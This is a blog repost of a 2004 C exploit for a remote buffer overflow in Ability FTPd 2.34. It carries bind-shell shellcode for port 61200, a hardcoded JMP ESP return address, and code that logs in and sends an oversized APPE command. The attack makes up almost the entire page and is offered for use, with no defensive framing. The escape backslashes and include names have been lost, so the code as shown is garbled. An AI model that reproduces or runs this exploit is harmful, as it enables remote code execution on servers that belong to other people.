ITPub博客

首页 > IT基础架构 > 网络安全 > Ability FTPd v2.34 Remote Commands Buffer Overflow Exploit

Ability FTPd v2.34 Remote Commands Buffer Overflow Exploit

原创 网络安全 作者:coolwinds 时间:2004-12-13 18:05:24 0 删除 编辑
/*

TESTED ON WINXP SP0 RUS

(c) by Dark Eagle
from unl0ck research team
http://unl0ck.void.ru

HAPPY NEW YEAR!

Greetz go out to: nekd0, antiq, fl0wsec (setnf, nuTshell), nosystem (CoKi), reflux...

*/
[@more@]
#include 
#include
#include
#include

// shellc0de by m00 team bind 61200
char shellcode[]=
"x90x90x90x90x90xEBx0Fx58x80x30xBBx40x81x38x6D"
"x30x30x21x75xF4xEBx05xE8xECxFFxFFxFFx52xD7xBA"
"xBBxBBxE6xEEx8Ax60xDFx30xB8xFBx28x30xF8x44xFB"
"xCEx42x30xE8xB8xDDx8Ax69xDDx03xBBxABxDDx3Ax81"
"xF6xE1xCFxBCx92x79x52x49x44x44x44x32x68x30xC1"
"x87xBAx6CxB8xE4xC3x30xF0xA3x30xC8x9Bx30xC0x9F"
"xBAx6DxBAx6Cx47x16xBAx6Bx2Dx3Cx46xEAx8Ax72x3B"
"x7AxB4x48x1DxC9xB1x2DxE2x3Cx46xCFxA9xFCxFCx59"
"x5Dx05xB4xBBxBBxBBx92x75x92x4Cx52x53x44x44x44"
"x8Ax7BxDDx30xBCx7Ax5BxB9x30xC8xA7xBAx6DxBAx7D"
"x16xBAx6Bx32x7Dx32x6CxE6xECx36x26xB4xBBxBBxBB"
"xE8xECx44x6Dx36x26xE8xBBxBBxBBxE8x44x6Bx32x7C"
"x36x3ExE1xBBxBBxBBxEBxECx44x6Dx36x36x2CxBBxBB"
"xBBxEAxD3xB9xBBxBBxBBx44x6Bx36x26xDExBBxBBxBB"
"xE8xECx44x6Dx8Ax72xEAxEAxEAxEAxD3xBAxBBxBBxBB"
"xD3xB9xBBxBBxBBx44x6Bx32x78x36x3ExCBxBBxBBxBB"
"xEBxECx44x6DxD3xABxBBxBBxBBx36x36x38xBBxBBxBB"
"xEAxE8x44x6Bx36x3ExCExBBxBBxBBxEBxECx44x6DxD3"
"xBAxBBxBBxBBxE8x44x6Bx36x3ExC7xBBxBBxBBxEBxEC"
"x44x6Dx8Ax72xEAxEAxE8x44x6BxE4xEBx36x26xFCxBB"
"xBBxBBxE8xECx44x6DxD3x44xBBxBBxBBxD3xFBxBBxBB"
"xBBx44x6Bx32x78x36x36x93xBBxBBxBBxEAxECx44x6D"
"xE8x44x6BxE3x32xF8xFBx32xF8x87x32xF8x83x7CxF8"
"x97xBAxBAxBBxBBx36x3Ex83xBBxBBxBBxEBxECx44x6D"
"xE8xE8x8Ax72xEAxEAxEAxD3xBAxBBxBBxBBxEAxEAx36"
"x26x04xBBxBBxBBxE8xEAx44x6Bx36x3ExA7xBBxBBxBB"
"xEBxECx44x6Dx44x6Bx53x34x45x44x44xFCxDExCFxEB"
"xC9xD4xD8xFAxDFxDFxC9xDExC8xC8xBBxF7xD4xDAxDF"
"xF7xD2xD9xC9xDAxC9xC2xFAxBBxFExC3xD2xCFxEBxC9"
"xD4xD8xDExC8xC8xBBxFCxDExCFxE8xCFxDAxC9xCFxCE"
"xCBxF2xD5xDDxD4xFAxBBxF8xC9xDExDAxCFxDExEBxC9"
"xD4xD8xDExC8xC8xFAxBBxFCxD7xD4xD9xDAxD7xFAxD7"
"xD7xD4xD8xBBxCCxC8x89xE4x88x89xBBxECxE8xFAxE8"
"xCFxDAxC9xCFxCExCBxBBxECxE8xFAxE8xD4xD8xD0xDE"
"xCFxFAxBBxD9xD2xD5xDFxBBxD7xD2xC8xCFxDExD5xBB"
"xDAxD8xD8xDExCBxCFxBBxB9xBBx54xABxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBAxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxD8xD6xDFxBBx6Dx30x30x21";


int conn(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
WSADATA wsa;
struct sockaddr_in sa;

WSAStartup(MAKEWORD(2,0), &wsa);
memset(&sa, 0, sizeof(sa));

hp = gethostbyname(host);
if (hp == NULL) {
printf("gethostbyname() error!n"); exit(0);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
printf("socketn");
exit(0);
}
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
{printf("connect() error!n");
exit(0);
}
printf("connected to %sn", host);
return sock;
}


void login(int sock, char *login, char *pass)
{

FILE *file;
char ubuf[1000], pbuf[1000], rc[200];
int i;
char bochka[2000], med[2000];

file = fopen("bochka.txt", "w+");

memset(bochka, 0x00, 2000);
memset(bochka, 0x43, 1000);
*(long*)&bochka[969] = 0x77F5801C; // ntdll.dll JMP ESP ADDR...
memcpy(bochka+strlen(bochka), &shellcode, sizeof(shellcode));

sprintf(med, "APPE %srn", bochka);
fprintf(file, "%s", med);

if ( strlen(pass) >= 100 ) { printf("2 long password!n"); exit(0); }
if ( strlen(login) >= 100 ) { printf("2 long login!n"); exit(0); }

sprintf(ubuf, "USER %srn", login);
send(sock, ubuf, strlen(ubuf), 0);
printf("USER sending...n");
Sleep(1000);
printf("OK!n");

sprintf(pbuf, "PASS %srn", pass);
send(sock, pbuf, strlen(pbuf), 0);
printf("PASS sending...n");
Sleep(1000);
recv(sock, rc, 200, 0);
if ( strstr(rc, "530")) {printf("Bad password!n"); exit(0); }
printf("OK!n");
Sleep(1000);
printf("Sending 604KY C MEDOM!n");
send(sock, med, strlen(med), 0);
Sleep(1000);
printf("TrY To CoNnEcT tO...nn");

}

int main(int argc, char **argv)
{
int sock = 0;
int data;
printf("nAbility FTP Server <= 2.34 R00T exploitn");
printf("by Dark Eagle [ unl0ck team ]nhttp://unl0ck.void.runn");

if ( argc < 4 ) { printf("usage: un-aftp.exe nn"); exit(0); }

sock = conn(argv[1], 21);
login(sock, argv[2], argv[3]);
closesocket(sock);
Sleep(2000);

return 0;
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-784568/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    947361